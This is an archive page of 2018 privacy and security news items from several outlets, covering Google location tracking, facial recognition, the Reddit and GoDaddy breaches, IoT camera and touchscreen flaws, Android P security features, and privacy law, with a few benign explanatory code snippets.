Category Archives: Privacy

Google tracks users’ movements even if they have disabled the “Location History” on devices

According to the AP, many Google services on both Android and iPhone store records of user location even if the users have disabled the “Location History”.

A recent investigation conducted by the Associated Press found that many Google services on both Android and iPhone devices store records of user location data, and the bad news is that they do so even when users have disabled “Location History” on their devices.

When a user disables “Location History” in the privacy settings of Google applications, this should prevent Google from storing location data.

In reality, the situation is quite different: AP experts discovered that even when users have turned off Location History, some Google apps automatically store “time-stamped location data” without explicit authorization.

“Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking. (It’s possible, although laborious, to delete it.)” reads the post published by the AP.

“For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are,”

“And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude—accurate to the square foot—and save it to your Google account.”

The AP used location data from an Android smartphone with ‘Location History’ disabled to design a map of the movements of Princeton postdoctoral researcher Gunes Acar.

Location History


Data plotted on the map includes records of Dr. Acar’s train commute on two trips to New York and visits to the High Line park, Chelsea Market, Hell’s Kitchen, Central Park, and Harlem, along with other markers, including Acar’s home address.

“The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.” continues the AP.

Google replied to the study conducted by the AP with the following statement:

“There are a number of different ways that Google may use location to improve people’s experience, including Location History, Web, and App Activity, and through device-level Location Services. We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time.” states Google.

Jonathan Mayer, a Princeton researcher and former chief technologist for the FCC’s enforcement bureau, remarked that location history data collection should stop when users switch off Location History:

“If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.”

The good news is that it is possible to stop Google from collecting your location: it is sufficient to also turn off the “Web and App Activity” setting; otherwise, Google will continue to store location markers.

Open your web browser, go to , select “Activity Controls”, and turn off both the “Web & App Activity” and “Location History” features.

For Android Devices:
Go to the “Security & location” settings, select “Privacy”, tap “Location”, and toggle it off.

For iOS Devices:
Google Maps users can open Settings → Privacy → Location Services and change the app’s location setting to ‘While Using’.

Pierluigi Paganini

(Security Affairs – Location Data, Google)

The post Google tracks users’ movements even if they have disabled the “Location History” on devices appeared first on Security Affairs.

Identifying Programmers by their Coding Style

Fascinating research de-anonymizing code -- from either source code or compiled code:

Rachel Greenstadt, an associate professor of computer science at Drexel University, and Aylin Caliskan, Greenstadt's former PhD student and now an assistant professor at George Washington University, have found that code, like other forms of stylistic expression, is not anonymous. At the DefCon hacking conference Friday, the pair will present a number of studies they've conducted using machine learning techniques to de-anonymize the authors of code samples. Their work could be useful in a plagiarism dispute, for instance, but it also has privacy implications, especially for the thousands of developers who contribute open source code to the world.

Google Tracks Android, iPhone Users Even With ‘Location History’ Turned Off

Google tracks you everywhere, even if you explicitly tell it not to. Every time a service like Google Maps wants to use your location, Google asks your permission to allow access to your location if you want to use it for navigating, but a new investigation shows that the company does track you anyway. An investigation by the Associated Press revealed that many Google services on Android and […]

Complaint Filed Against German Government Due To Hacking of Citizen Computers and Mobile Phones

A German data protection group named Digital Courage has filed a complaint against the German government in the Constitutional Court. The government […]

Complaint Filed Against German Government Due To Hacking of Citizen Computers and Mobile Phones on Latest Hacking News.

Faces Are Being Scanned At US Airports With No Safeguards on Data Use

schwit1 writes: The program makes boarding an international flight a breeze: Passengers step up to the gate, get their photo taken and proceed onto the plane. There is no paper ticket or airline app. Thanks to facial recognition technology, their face becomes their boarding pass.... The problem confronting thousands of travelers is that few companies participating in the program, called the Traveler Verification Service, give explicit guarantees that passengers' facial recognition data will be protected. And even though the program is run by the Department of Homeland Security, federal officials say they have placed no limits on how participating companies -- mostly airlines but also cruise lines -- can use that data or store it, opening up travelers' most personal information to potential misuse and abuse such as being sold or used to track passengers' whereabouts. The Department of Homeland Security is now using the data to track foreigners overstaying their visas, according to the Times. "After passengers' faces are scanned at the gate, the scan is sent to Customs and Border Protection and linked with other personally identifying data, such as date of birth and passport and flight information." But the face scans are collected by independent companies, and Border Protection officials insist they have no control over how that data gets used.

Read more of this story at Slashdot.

Crestron Touchscreens Could Spy On Hotel Rooms, Meetings

An anonymous reader quotes a report from Wired: The connected devices you think about the least are sometimes the most insecure. That's the takeaway from new research to be presented at the DefCon hacking conference Friday by Ricky Lawshae, an offensive security researcher at Trend Micro. Lawshae discovered over two dozen vulnerabilities in Crestron devices used by corporations, airports, sports stadiums, and local governments across the country. While Crestron has released a patch to fix the issues, some of the weaknesses allowed for hackers to theoretically turn the Crestron Android touch panels used in offices and hotel rooms into spy devices. Lawshae quickly noticed that these devices have security authentication protections disabled by default. For the most part, the Crestron devices Lawshae analyzed are designed to be installed and configured by third-party technicians, meaning an IT engineer needs to voluntarily turn on security protections. The people who actually use Crestron's devices after they're installed might not even know such protections exist, let alone how crucial they are. Crestron devices do have special engineering backdoor accounts which are password-protected. But the company ships its devices with the algorithm that is used to generate the passwords in the first place. That information can be used by non-privileged users to reverse engineer the password itself, a vulnerability simultaneously identified by both Lawshae and Jackson Thuraisamy, a vulnerability researcher at Security Compass. There were also over two dozen other vulnerabilities that could be exploited to do things like transform them into listening devices. In addition to being able to remotely record audio via the microphones to a downloadable file, Lawshae was also able to remotely stream video from the webcam and open a browser and display a webpage to an unsuspecting room full of meeting attendees. 
"Crestron has issued a fix for the vulnerabilities, and firmware updates are now available," reports Wired.

Read more of this story at Slashdot.

Sensitive data on 31,000 GoDaddy servers exposed online

By Waqas

All thanks to an unsecured AWS S3 bucket. GoDaddy is the latest victim of cybercriminals and has joined the league of companies that got confidential data leaked due to unsecured Amazon S3 buckets. The world’s leading domain name registering platform, GoDaddy, boasts more than 18m customers, which makes a cyber-attack on this organization a high-profile feat. […]

This is a post from Read the original post: Sensitive data on 31,000 GoDaddy servers exposed online

New WhatsApp flaws let attackers hack private/group chats to fake news

By Waqas

Spreading fake news through WhatsApp was never so easy before. According to the latest research from Check Point security firm, WhatsApp users are at the risk of getting their private chats and group conversations hacked and exploited. Researchers discovered a new wave of attacks that allow cybercriminals to penetrate your messages on WhatsApp. This penetration […]

This is a post from Read the original post: New WhatsApp flaws let attackers hack private/group chats to fake news

Smashing Security #090: Fortnite for Android, and the FCC’s DDoS BS

Fortnite players are told they’ll have to disable a security setting on Android, the FCC finally admits that it wasn’t hit by a DDoS attack, and Verizon’s VPN smallprint raises privacy concerns.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault, joined this week by David Bisson.

Freelance Platform Upwork’s Opt-in Service Tracks Freelancers By Capturing Screenshots, Webcam Photos and Measuring Clicks and Keystrokes Frequency

Caroline O'Donovan, reporting for BuzzFeed News: To convince workers to join the unstable and unreliable world of freelance work, startups and platforms often promise freedom and flexibility. But on the digital freelance platform Upwork, company software tracks hundreds of freelancers while they work by saving screenshots, measuring the frequency of their clicks and keystrokes, and even sometimes taking webcam photos of the workers. Upwork, which hosts "millions" of coding and design gigs, guarantees payment for freelancers, even if the clients who hired them refuse to pay. But in order to get the money, freelancers have to agree in advance to use Upwork's digital Work Diary, which counts keystrokes to measure how "productive" they are and takes screenshots of their computer screens to determine whether they're actually doing the work they say they're doing. Upwork's tracker isn't automatically turned on for all gigs on the platform. Some freelancers like it because it guarantees payment, but others find it unnerving. [...] Upwork maintains that freelancers don't have to use the time tracker if it makes them uncomfortable. [...] But while Work Diary may be opt-in on its surface, Microsoft Research's Mary Gray said freelancers may not feel like they really have a choice.

Read more of this story at Slashdot.

New Facial Recognition Tool, Designed For Research Purposes, Tracks Targets Across Different Social Networks

Researchers at Trustwave on Wednesday released a new open-source tool called Social Mapper, which uses facial recognition to track subjects across social media networks. Designed for security researchers performing social engineering attacks, the system automatically locates profiles on Facebook, Instagram, Twitter, LinkedIn, and other networks based on a name and picture. Unlike tools such as Geofeedia that require access to certain APIs, Social Mapper performs automated manual searches in an instrumented browser window. The Verge: Those searches can already be performed manually, but the automated process means it can be performed far faster and for many people at once. "Performing intelligence gathering online is a time-consuming process," Trustwave explained in a post this morning. "What if it could be automated and done on a mass scale with hundreds or thousands of individuals?"

Read more of this story at Slashdot.

Hacker leaks Snapchat’s source code on Github

By Waqas

Pakistani Hacker Posted Authentic Snapchat Source Code on GitHub – Snapchat’s source code is stolen…can there be a bigger news than that? Perhaps there is! Not only that the source code has been stolen but also posted on Microsoft-owned GitHub of all the platforms. Reportedly, the hacker hails from a small village in Pakistan and uses the […]

This is a post from Read the original post: Hacker leaks Snapchat’s source code on Github

NEC Unveils Facial Recognition System For 2020 Tokyo Olympics

NEC, a Japanese IT and networking company, announced plans to provide a large-scale facial recognition system for the 2020 Summer Olympic and Paralympic Games in Tokyo. "The system will be used to identify over 300,000 people at the games, including athletes, volunteers, media, and other staff," reports The Verge. From the report: NEC's system is built around an AI engine called NeoFace, which is part of the company's overarching Bio-IDiom line of biometric authentication technology. The Tokyo 2020 implementation will involve linking photo data with an IC card to be carried by accredited people. NEC says that it has the world's leading face recognition tech based on benchmark tests from the US's National Institute of Standards and Technology. NEC demonstrated the technology in Tokyo today, showing how athletes and other staff wouldn't be able to enter venues if they were holding someone else's IC card. The company even brought out a six-foot-eight former Olympic volleyball player to demonstrate that the system would work with people of all heights, though he certainly had to stoop a bit. It worked smoothly with multiple people moving through it quickly; the screen displayed the IC card holder's photo almost immediately after.

Read more of this story at Slashdot.

Android Pie: Security and privacy changes

It is official: “Android P” is Android Pie, and it comes with a variety of new capabilities and security and privacy changes. The newest version (9.0) of the popular mobile OS introduces a new system navigation featuring a single home button, smart text selection, digital wellbeing controls, adaptive battery, a neural networks API, smart reply, and more. Security improvements Android 9 has the following security improvements: Built-in support for DNS over TLS, automatically upgrading DNS … More

The post Android Pie: Security and privacy changes appeared first on Help Net Security.

Pentagon Restricts Use of Fitness Trackers, Other Devices

Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness tracker or cellphone applications that can reveal their location, according to a new Pentagon order. From a report: The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel so those capabilities must be turned off in certain operational areas. Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base. "These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said. Zack Whittaker, a security reporter at TechCrunch, said, DoD's statement today appears to be a response to the revelation that fitness tracker app Polar was exposing locations of spies and military personnel.

Read more of this story at Slashdot.

Avast Pulls the Latest Version of CCleaner Following Privacy Controversy

Piriform, the maker of CCleaner, has pulled v5.45 of its suite from the website after users expressed concerns over the privacy changes in the application, the company, which was acquired by Avast last year, said. In v5.45, the company made it impossible to disable "active monitoring", and the privacy settings had been removed for free customers. Additionally, as BetaNews reported earlier this week, Avast also made it impossible for users to quit the software. Addressing these concerns, Avast said, "Today we have removed v5.45 and reverted to v5.44 as the main download for CCleaner while we work on a new version with several key improvements." The company added: We're currently working on separating out cleaning functionality from analytics reporting and offering more user control options which will be remembered when CCleaner is closed. We're also creating a factsheet to share which will outline the data we collect, for which purposes and how it is processed. [...] As stated before, we'll split cleaning alerts (which don't send any data) from UI trend data (which is anonymous and only there to measure the user experience) and provide a separate setting for each in the user preferences. Some of these features run as a separate process from the UI: we'll restore visibility of this in the notifications area, and you'll be able to close it down from that icon menu as before. We understand the importance of this to you all. This work is our number 1 priority and we are taking the time to get it right in the next release. There are numerous changes required, so that does mean it will take weeks, not days. While we work on this, we have removed version 5.45 and reinstated version 5.44. According to stats shared by the company, CCleaner has been downloaded over two billion times. In a week, it is estimated to see five million downloads.

Read more of this story at Slashdot.

Cybercrime gangs continue to go where the money is

According to the APWG’s new Phishing Activity Trends Report, phishing in the first part of 2018 surged 46 percent higher than late 2017. The total number of phish detected in the first quarter of 2018 was 263,538. That was up from the 180,577 observed in the fourth quarter of 2017. It was also significantly greater than the 190,942 seen in the third quarter of 2017. The phishing attacks of early 2018 targeted users of online … More

The post Cybercrime gangs continue to go where the money is appeared first on Help Net Security.

Smashing Security #089: Data breaches, ransomware, Bitcoin robberies, and typewriters

Ransomware rears its head again, Dixons Carphone reveals its data breach was almost 1000% worse than they previously thought, a man is accused of stealing five million dollars worth of cryptocurrency through hijacking mobile phones, and a Canadian guy called Norman is rushing to get the typewriters out of storage.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by journalist Geoff White.

Top Genetic Testing Firms Promise Not To Share Data Without Consent

Ancestry, 23andMe and several other top genetic testing companies pledged on Tuesday not to share users' DNA data with others without consent. "Under the new guidelines, the companies said they would obtain consumers' "separate express consent" before turning over their individual genetic information to businesses and other third parties, including insurers," reports The Washington Post. "They also said they would disclose the number of law-enforcement requests they receive each year." From the report: The new commitments come roughly three months after local investigators used a DNA-comparison service to track down a man police believed to be the Golden State Killer, who allegedly raped and killed dozens of women in California in the 1970s and 1980s. Investigators identified the suspect using a decades-old DNA sample obtained from the crime scene, which they uploaded to GEDmatch, a crowdsourced database of roughly a million distinct DNA sets shared by volunteers. Investigators said they did not need a court order before using GEDmatch, sparking fresh fears that users' biological data might be too easy to access -- and could end up in the wrong hands -- without additional regulation on the fast-growing, already popular industry.

Read more of this story at Slashdot.

Reddit hacked: Hackers steal complete copy of old database backup

By Waqas

Reddit says the breach took place after hackers intercepted SMS that were supposed to be delivered to employees. The social media giant Reddit has announced that it has suffered a data breach in which attackers hacked into its system and ended up stealing data of its registered users including emails and encrypted passwords. Reddit discovered the […]

This is a post from Read the original post: Reddit hacked: Hackers steal complete copy of old database backup

A Hacker Broke Into a Few of Reddit’s Systems and Managed To Access Some User Data, Company Says

A hacker broke into a few of Reddit's systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords, Reddit said Wednesday. From the announcement: Since then we've been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again. Reddit says the incident occurred between June 14 and June 18 when the hacker "compromised a few of our employees' accounts with our cloud and source code hosting providers." Interestingly, even as Reddit employees maintain 2FA on their accounts, the attacker managed to get access to their data. "We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept," the company said. The company says it has a reason to believe the attacker had access to the following data: All Reddit data from 2007 and before including account credentials and email addresses. What was accessed: A complete copy of an old database backup containing very early Reddit user data -- from the site's launch in 2005 through May 2007. In Reddit's first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then. How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you're clear here.
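Reddit's exact password scheme isn't public beyond "salted and hashed," but the general technique is easy to sketch. Below is a minimal illustration in Python of what salting and hashing means in practice; the function names and PBKDF2 parameters are our own assumptions, not Reddit's actual implementation:

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Return a (salt, digest) pair for the given password.

    A fresh random salt per user means two users with the same
    password still end up with different digests, which defeats
    precomputed rainbow-table attacks.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, digest):
    """Recompute the digest with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)
```

Even stolen salted hashes can be cracked offline against weak passwords, which is why Reddit reset credentials that "might still be valid."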

Read more of this story at Slashdot.

Achieving compliance: GDPR, CCPA and beyond

AB 375, or the California Consumer Privacy Act (CCPA) of 2018, was signed into law by California Governor Jerry Brown on June 28, 2018, and is recognized as one of the toughest privacy laws in the U.S. The statute requires companies to disclose to California residents what information is being collected on them and how it will be used. Companies have 18 months to prepare for this new law to go into effect; it’s set to … More

The post Achieving compliance: GDPR, CCPA and beyond appeared first on Help Net Security.

Concert Ticket Retailer AXS Collects Personally Identifiable Data Through Its App, Which is Mandatory To Download, and Sells It To 3rd Party Without Anonymizing

AXS, a digital marketplace operated by Anschutz Entertainment Group (AEG), is the second largest presenter of live events in the world after Live Nation Entertainment (i.e. Ticketmaster). Paris Martineau of The Outline reports that the company forces customers to download a predatory app which goes on to snatch up a range of personally identifiable data and sells it to a range of companies, including Facebook and Google, without ever anonymizing or aggregating them. From the report: The company requires users to download an app to use any ticket for a concert, game, or show bought through AXS, and it doesn't come cheap. AXS uses a system called Flash Seats, which relies on a dynamically generated barcode system (read: screenshotting doesn't work) to fight off ticket scalping and reselling. [...] Here's a brief overview of all of the information that can be collected from just the mobile app alone, nearly all of which is shared with third parties without being anonymized or aggregated: first and last name, precise location (as determined by GPS, WiFi, and other means), how often the app is used, what content is viewed using the app, which ads are clicked, what purchases are made (and not made), a user's personal advertising identifier, IP address, operating system, device make and model, billing address, credit card number, security code, mailing address, phone number, and email address, among many others. [...] AXS also shares the personal data collected on its customers with event promoters and other clients, none of whom are bound even by this (extremely lax) privacy policy.

Read more of this story at Slashdot.

Naked Security – Sophos: NSA hasn’t closed security windows Snowden climbed through

One of three problems found in an audit: two-person access controls haven't been properly implemented at data centers and equipment rooms.

How rogue data puts organisations at risk of GDPR noncompliance

The GDPR compliance deadline came in by force on 25th May 2018 and applies to all organisations processing and holding the personal information of data subjects. This includes contacts such as customers, partners and patients. Much has been written about the immense efforts of organisations to improve their data privacy procedures in order to comply with GDPR, but there is a largely undiscussed oversight lurking just under the surface which, if left unaddressed, still leaves … More

The post How rogue data puts organisations at risk of GDPR noncompliance appeared first on Help Net Security.

Infosecurity.US: Bye-Bye, DNA – Hello GSK (and others)

Via The Outline's author, Paris Martineau, comes this tale of opt-in/opt-out, GlaxoSmithKline, 23andMe, and of course the goods: your DNA. Which leaves a nagging question: Why would I (or you, for that matter) agree to hand over my uniquely identifying DNA data to a commercial enterprise (that only answers to its shareholders, and only has its best interests in mind) to use as they see fit? Oh, and a couple of other questions: Do you trust a big-pharma corporation with your own personal Map of Life? What about the future use of that data, once it's in the slipstream of artificially intelligent genetic-testing-reliant health insurance companies? Food for Thought or just Paranoia? You be the judge; after all, it's your DNA, right?

"In short, most — if not all — of the information 23andMe has on its users has probably been shared with someone that isn’t 23andMe itself, and money might have even changed hands. Which is all perfectly within the company’s rights to do, since they agreed to it (probably blindly) when they signed up." - via The Outline author Paris Martineau in the well crafted post 'How To Sign Away The Rights To Your DNA'


Flaw in Swann smart security cameras allows access to user’s live stream

By Waqas

Security cameras and other IoT devices have been frequently identified to be incompetent and plagued with a variety of built-in flaws that render them vulnerable to exploitation by hackers. The same has been proven yet again by a team of security researchers from Pen Test Partners. Researchers Andrew Tierney, Chris Wade, and Ken Munro participated […]

This is a post from Read the original post: Flaw in Swann smart security cameras allows access to user’s live stream

Canadian Malls Are Using Facial Recognition To Track Shoppers’ Age, Gender Without Consent

At least two malls in Calgary are using facial recognition technology to track shoppers' ages and genders without first obtaining their consent. "A visitor to Chinook Center in south Calgary spotted a browser window that had seemingly accidentally been left open on one of the mall's directories, exposing facial-recognition software that was running in the background of the digital map," reports "They took a photo and posted it to the social networking site Reddit on Tuesday." From the report: The mall's parent company, Cadillac Fairview, said the software, which they began using in June, counts people who use the directory and predicts their approximate age and gender, but does not record or store any photos or video from the directory cameras. Cadillac Fairview said the software is also used at Market Mall in northwest Calgary, and other malls nationwide. Cadillac Fairview said currently the only data they collect is the number of shoppers and their approximate age and gender, but most facial recognition software can be easily adapted to collect additional data points, according to privacy advocates. Under Alberta's Personal Information Privacy Act, people need to be notified their private information is being collected, but as the mall isn't actually saving the recordings, what they're doing is legal. It's not known how many other Calgary-area malls are using the same or similar software and if they are recording the data.

Read more of this story at Slashdot.

New Android P includes several security improvements

According to the Android developer Program Overview, the next major version of Android, Android 9.0 or P, is set to arrive soon. The plans show a final release within the next three months (Q3 2018).

The end of the Android P beta program is approaching, with the first release candidate built and released in July. As a security company, we simply can’t help but take a close look at what kind of security updates will be included in Android’s newest version.

We are not going to write about new features of Android P, but instead will focus our attention on security improvements. Android P introduces a number of updates that enhance the security of your apps and the devices that run them.

Improved fingerprint authentication

Most devices (and many apps) have an authentication mechanism to keep users safe, and the new Android P OS provides improved biometrics-based authentication. Android 8.1 introduced two metrics that help its biometric system repel attacks: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). Along with a new model that splits biometric security into weak and strong categories, these make biometric authentication more reliable and trustworthy in Android P.

Android P also promises to deliver a standardized look, feel, and placement for the dialog that requests a fingerprint. This increases users' confidence that they are interacting with a trusted source. App developers can trigger the new system fingerprint dialog using the new BiometricPrompt API, and switching over to the system dialog as soon as possible is recommended. The platform itself selects an appropriate biometric to authenticate with, so developers don't need to implement this logic themselves.

Biometric authentication mechanisms are becoming increasingly popular and they have a lot of potential, but only if designed securely, measured accurately, and implemented correctly.

Signature Scheme v3

Android P adds support for APK Signature Scheme v3. The major difference from v2 is support for key rotation, which will be useful for developers because the scheme includes a signer lineage (ApkSignerLineage). As the scheme's authors state:

“The signer lineage contains a history of signing certificates with each ancestor attesting to the validity of its descendant. Each additional descendant represents a new identity that can sign an APK. In this way, the lineage contains a proof of rotation by which the APK containing it can demonstrate, to other parties, its ability to be trusted with its current signing certificate, as though it were signed by one of its older ones. Each signing certificate also maintains flags which describe how the APK itself would like to trust the old certificates, if at all, when encountered.”

This makes it easy to start signing with a new certificate: you simply link the new certificate, in the lineage, to the older ones the APK was previously signed with.

Although Scheme v3 is enabled by default, note that you can still use an old signing certificate.
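The lineage described above can be pictured as a chain of attestations, with each old key vouching for its successor. The following Python sketch is only a conceptual model of that chain, not the actual v3 format: HMAC stands in for real certificate signatures, and all names and key values are hypothetical.

```python
import hashlib
import hmac

def attest(old_key, new_cert):
    """The holder of old_key vouches for new_cert (HMAC stands in for a real signature)."""
    return hmac.new(old_key, new_cert, hashlib.sha256).digest()

def build_lineage(keys):
    """Build a list of (cert, attestation-by-previous-key) entries, oldest first."""
    lineage = []
    for prev, cur in zip(keys, keys[1:]):
        cert = hashlib.sha256(cur).digest()  # stand-in for cur's certificate
        lineage.append((cert, attest(prev, cert)))
    return lineage

def verify_lineage(keys, lineage):
    """A verifier that trusts the oldest key can walk the chain to the newest one."""
    for prev, (cert, proof) in zip(keys, lineage):
        if not hmac.compare_digest(attest(prev, cert), proof):
            return False
    return True

keys = [b"key-2016", b"key-2017", b"key-2018"]
lineage = build_lineage(keys)
print(verify_lineage(keys, lineage))  # True
```

The point of the chain is that a party which trusted only the oldest certificate can still accept an APK signed with the newest one, because every step in between is attested.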

HTTP Secure (HTTPS) by default

Nowadays, many apps still transmit users' information unencrypted, leaving personal data vulnerable to hackers. People worried about potential breaches or invasions of privacy can feel more secure knowing that their transmissions in Android P will be secure by default.

In Android P, third-party developers will have to use HTTPS for their apps (it was optional in Android 8.0). However, they can still ignore this advice and specify certain domains that are allowed to carry unencrypted traffic.
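The per-domain exception is declared in an app's Network Security Configuration file. A minimal sketch might look like the following (the legacy domain is a placeholder):

```xml
<!-- res/xml/network_security_config.xml -->
<network-security-config>
    <!-- Block cleartext (HTTP) traffic everywhere by default -->
    <base-config cleartextTrafficPermitted="false" />
    <!-- ...except for one legacy domain that still requires it -->
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">legacy.example.com</domain>
    </domain-config>
</network-security-config>
```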

Protected confirmation

Devices that launch with Android P include a protected confirmation API. Using this API, apps can use the ConfirmationPrompt class to display a confirmation prompt that asks the user to approve a short statement. The statement allows the app to confirm that the user really intends to complete a sensitive transaction, such as making a bill payment.

As soon as the user accepts the statement, your app receives a cryptographic signature, protected by a keyed-hash message authentication code (HMAC). The signature is produced by the trusted execution environment (TEE), which also protects the display of the confirmation dialog and the user's input. The signature indicates, with high confidence, that the user has seen the statement and agreed to it.
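To see why that signature is convincing, here is a rough Python model of the flow, assuming a key that only the TEE holds. The names, key, and statements are illustrative, and HMAC-SHA256 stands in for the device's actual signing scheme:

```python
import hashlib
import hmac

# Hypothetical key known only to the trusted execution environment (TEE).
DEVICE_KEY = b"key-held-inside-the-TEE"

def tee_confirm(statement, user_approved):
    """The TEE signs the statement only if the user approved it on the trusted UI."""
    if not user_approved:
        return None
    return hmac.new(DEVICE_KEY, statement, hashlib.sha256).digest()

def relying_party_verify(statement, tag):
    """A verifier that shares the key checks the tag against the exact statement."""
    expected = hmac.new(DEVICE_KEY, statement, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)

tag = tee_confirm(b"Pay $100 to ACME Utilities", True)
print(relying_party_verify(b"Pay $100 to ACME Utilities", tag))  # True
print(relying_party_verify(b"Pay $9000 to attacker", tag))       # False
```

Because the tag binds the key to the exact statement text, a tampered statement fails verification, which is what lets a bank or biller trust the confirmation.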

Hardware security module

Here’s an additional update that benefits everyone: devices with Android P will support a StrongBox Keymaster, a hardware security module that contains its own CPU, secure storage, and a true random number generator. It also protects against package tampering and unauthorized sideloading of apps.

In order to support StrongBox implementations, Android P uses a subset of algorithms and key sizes, such as:

  • RSA 2048
  • AES 128 and 256
  • ECDSA P-256
  • HMAC-SHA256 (supports key sizes between 8 bytes and 64 bytes, inclusive)
  • Triple DES 168

Peripherals background policy

With Android P, apps idling in the background will no longer be able to access your smartphone’s microphone, camera, or sensors, and users get a notification when an app attempts such access. When that happens, the microphone reports empty audio, cameras disconnect (causing an error if the app tries to use them), and all sensors stop reporting events.

Backup data encryption update

It’s no secret that Android backs up data from your device so that users can restore it after signing into their Google account from another device. Starting with Android P, backups will be encrypted with a client-side secret. This means encryption is done locally on the device, whereas before, a backup of your device was encrypted directly on the server.

Because of this new privacy measure, users will need the device’s PIN, pattern, or password to restore data from the backups made by their device.
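The idea behind a client-side secret can be sketched in a few lines of Python: derive the encryption key on the device from the user's PIN plus a random salt, so the server never holds enough to decrypt the backup. This is only an illustration of the principle (Android's real scheme additionally involves hardware-backed keys, and the PIN and iteration count here are made up):

```python
import hashlib
import os

def derive_backup_key(pin, salt):
    """Stretch the user's PIN into a 256-bit key, locally on the device."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, 200_000)

salt = os.urandom(16)                 # random, stored alongside the backup
key = derive_backup_key("4921", salt)

# Restoring requires the same PIN: a wrong PIN derives a different key,
# so the backup remains unreadable.
assert derive_backup_key("4921", salt) == key
assert derive_backup_key("0000", salt) != key
```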

Wrapping things up

All these improvements mean one thing: it will be significantly harder for criminals to access data they shouldn’t. After the massive number of breaches over the last two years, this should come as a relief for consumers who simply want to use their phones without fear of their privacy being compromised.

The post New Android P includes several security improvements appeared first on Malwarebytes Labs.

The Trump Administration is Talking To Facebook and Google About Potential Rules For Online Privacy

The Trump administration is crafting a proposal to protect Web users' privacy, aiming to blunt global criticism that the absence of strict federal rules in the United States has enabled data mishaps at Facebook and others in Silicon Valley. From a report: Over the past month, the Commerce Department has been huddling with representatives of tech giants such as Facebook and Google, Internet providers including AT&T and Comcast, and consumer advocates [Editor's note: the link may be paywalled; alternative source], according to four people familiar with the matter but not authorized to speak on the record. The government's goal is to release an initial set of ideas this fall that outlines Web users' rights, including general principles for how companies should collect and handle consumers' private information, the people said. The forthcoming blueprint could then become the basis for Congress to write the country's first wide-ranging online-privacy law, an idea the White House recently has said it could endorse. "Through the White House National Economic Council, the Trump Administration aims to craft a consumer privacy protection policy that is the appropriate balance between privacy and prosperity," Lindsay Walters, the president's deputy press secretary, said in a statement. "We look forward to working with Congress on a legislative solution consistent with our overarching policy."

Identity theft protection firm LifeLock may have exposed user email addresses

By Waqas

LifeLock, an Arizona-based identity theft protection firm, may have exposed the email addresses of millions of its customers. Simply put: a firm vowing to protect the online identities of its customers may have exposed those identities to malicious hackers and cybercriminals. It happened due to a critical vulnerability which exposed LifeLock’s customers to phishing and identity […]

OCR Issues Guidance on Disclosures to Family, Friends and Others

In its most recent cybersecurity newsletter, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) provided guidance on identifying vulnerabilities and mitigating the associated risks of software used to process electronic protected health information (“ePHI”). The guidance, along with additional resources identified by OCR, is outlined below:

  • Identifying software vulnerabilities. Every HIPAA-covered entity is required to perform a risk analysis that identifies risks and vulnerabilities to the confidentiality, integrity and availability of ePHI. Such entities must also implement measures to mitigate risks identified during the risk analysis. In its guidance, OCR indicated that mitigation activities could include installing available patches (where reasonable and appropriate) or, where patches are unavailable (such as in the case of obsolete or unsupported software), reasonable compensating controls, such as restricting network access.
  • Patching software. Patches may be applied to software and firmware on a wide range of devices, and the installation of vendor patches is typically routine. The installation of such updates, however, may result in unexpected events due to the interconnected nature of computer programs and systems. OCR recommends that organizations install patches for identified vulnerabilities in accordance with their security management processes. In order to help ensure the protection of ePHI during patching, OCR also identifies common steps in patch management as including evaluation, patch testing, approval, deployment, verification and testing.

In addition to the information contained in the guidance, OCR identified a number of additional resources.

Police Are Seeking More Digital Evidence From Tech Companies

U.S. law enforcement agencies are increasingly asking technology companies for access to digital evidence on mobile phones and apps, with about 80 percent of the requests granted, a new study found. From a report: The report released Wednesday by the Center for Strategic and International Studies found local, state and federal law enforcement made more than 130,000 requests last year for digital evidence from six top technology companies -- Alphabet's Google, Facebook, Microsoft, Twitter, Verizon's media unit Oath, and Apple. If results from telecom and cable providers Verizon, AT&T, and Comcast are added in, the number jumps to more than 660,000. The requests covered everything from the content of communications to location data and names of particular users. "The number of law enforcement requests, at least as directed at the major U.S.-based tech and telecom companies, has significantly increased over time," the Washington-based think tank found. "Yet, the response rates have been remarkably consistent."

